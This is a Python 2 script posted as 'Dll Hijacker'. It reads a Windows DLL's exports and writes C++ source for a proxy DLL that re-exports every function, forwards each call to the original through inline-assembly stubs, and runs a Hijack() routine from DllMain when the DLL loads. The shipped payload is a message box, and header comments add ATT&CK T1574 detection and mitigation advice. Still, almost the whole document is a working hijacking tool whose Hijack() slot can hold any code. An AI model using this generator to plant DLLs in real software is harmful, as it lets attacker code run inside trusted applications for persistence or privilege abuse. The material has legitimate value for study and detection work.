Dll Hijacker
Posted 杀死比特
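#coding=utf-8
#
# Dll Hijacker
#
# platform: Python 2.x @ Windows
#
# author:Coca1ne
#
# What this script does
#   Reads the export table of the DLL named on the command line and writes
#   "<name>.cpp" into the current directory. The generated C++ source builds
#   a proxy DLL that re-exports every name/ordinal of the original, forwards
#   each call to the real module through GetProcAddress, and runs Hijack()
#   (a message box in this proof of concept) from DllMain on process attach.
#   The stubs rely on __declspec(naked) and inline __asm.
#
# Defensive context (MITRE ATT&CK T1574, Hijack Execution Flow)
#   Detection: image-load telemetry (for example Sysmon event ID 7) showing a
#   module with a system DLL's file name loaded from an application or
#   user-writable directory, especially when unsigned or when its signer
#   differs from the original; a module whose exports all point at short
#   forwarding stubs; the strings "DLL Hijack! by DLLHijacker" in an
#   unmodified build.
#   Mitigation: load dependencies by absolute path or with LoadLibraryEx and
#   LOAD_LIBRARY_SEARCH_SYSTEM32, call SetDefaultDllDirectories early, keep
#   application directories non-writable for standard users, and enforce
#   application control rules for DLLs (WDAC / AppLocker).

import os
import sys
import time

import pefile


# C++ skeleton of the proxy DLL. DEFINE_DLL_EXPORT_FUNC and DLL_FILENAME are
# placeholders substituted in generate(); the \" escapes are literal in this
# raw string and are stripped by generate() before the file is written.
# NOTE: the line breaks and indentation of this template are reconstructed;
# the published listing had them collapsed.
_CPP_TEMPLATE = r"""//Generate by DLLHijacker.py

#include <Windows.h>

DEFINE_DLL_EXPORT_FUNC
#define EXTERNC extern \"C\"
#define NAKED __declspec(naked)
#define EXPORT __declspec(dllexport)
#define ALCPP EXPORT NAKED
#define ALSTD EXTERNC EXPORT NAKED void __stdcall
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall
#define ALCDECL EXTERNC NAKED void __cdecl

namespace DLLHijacker
{
    HMODULE m_hModule = NULL;
    DWORD m_dwReturn[17] = {0};
    inline BOOL WINAPI Load()
    {
        TCHAR tzPath[MAX_PATH];
        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));
        m_hModule = LoadLibrary(tzPath);
        if (m_hModule == NULL)
            return FALSE;
        return (m_hModule != NULL);
    }
    inline VOID WINAPI Free()
    {
        if (m_hModule)
            FreeLibrary(m_hModule);
    }
    FARPROC WINAPI GetAddress(PCSTR pszProcName)
    {
        FARPROC fpAddress;
        CHAR szProcName[16];
        fpAddress = GetProcAddress(m_hModule, pszProcName);
        if (fpAddress == NULL)
        {
            if (HIWORD(pszProcName) == 0)
            {
                wsprintf(szProcName, \"%d\", pszProcName);
                pszProcName = szProcName;
            }
            ExitProcess(-2);
        }
        return fpAddress;
    }
}
using namespace DLLHijacker;
VOID Hijack()
{
    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
        if(Load())
            Hijack();
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        Free();
    }
    return TRUE;
}"""


def main():
    """List the exports of the DLL in sys.argv[1] and emit the proxy source.

    Any failure (unreadable file, no export directory, write error) is
    reported by printing the exception; nothing is re-raised.
    """
    try:
        pe = pefile.PE(sys.argv[1])
        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
        print("[!]Find export function :[ %d ]\r\n" % len(exportTable))
        for exptab in exportTable:
            print("%3s %10s" % (exptab.ordinal, exptab.name))
        print("\r\n[+] generating DLL Hijack cpp file ...")
        generate(exportTable)
        print("\r\n[+] generating DLL Hijack cpp file has finished!")
    except Exception as e:
        # Top-level boundary of a command-line tool: report and stop.
        print(e)


def generate(exportTable):
    """Write "<dll name>.cpp" for the exports in *exportTable*.

    exportTable is the symbol list main() takes from
    pe.DIRECTORY_ENTRY_EXPORT.symbols; each entry is read for its ``name``
    and ``ordinal`` attributes. The output file name is derived from
    sys.argv[1] and the file is created in the current working directory.

    NOTE(review): export names are pasted verbatim into the pragma lines and
    into C identifiers. A name that is not a plain C identifier yields source
    that does not compile as intended; validate the names before running
    this against a file you do not trust.
    """
    # os.path handles paths without a backslash, where the previous
    # rindex('\\') lookup raised ValueError.
    filename = os.path.splitext(os.path.basename(sys.argv[1]))[0]

    # One linker directive per export: same public name and ordinal, bound
    # to the forwarding stub emitted further down.
    pragma_lines = []
    for exptable in exportTable:
        pragma_lines.append(
            r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name)
            + "=_DLLHijacker_" + str(exptable.name)
            + ",@" + str(exptable.ordinal) + "\")\n")
    define_dll_exp_func = "".join(pragma_lines)

    segments = _CPP_TEMPLATE.replace('DLL_FILENAME', filename)
    # Backslashes are stripped last so the \" escapes of the template and of
    # the pragma lines become plain quotes in the output.
    segments = segments.replace(
        "DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\', '')

    # One naked cdecl stub per export; it resolves the real function by name
    # at call time and jumps back through the saved return address.
    stubs = []
    for exptable in exportTable:
        stubs.append(
            "ALCDECL DLLHijacker_" + str(exptable.name) + "(void)\n{"
            + "\n __asm POP m_dwReturn[0 * TYPE long];\n GetAddress(\""
            + str(exptable.name)
            + "\")();\n __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n")
    forward_dll_exp_func = "".join(stubs)

    # The with-block closes the file even when a write fails.
    with open(filename + ".cpp", "w+") as fp:
        fp.write(segments)
        fp.write(forward_dll_exp_func)


def usage():
    """Print the command-line synopsis."""
    print("Usage:")
    print(" %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0])


if __name__ == "__main__":
    if len(sys.argv) < 2:
        usage()
    else:
        main()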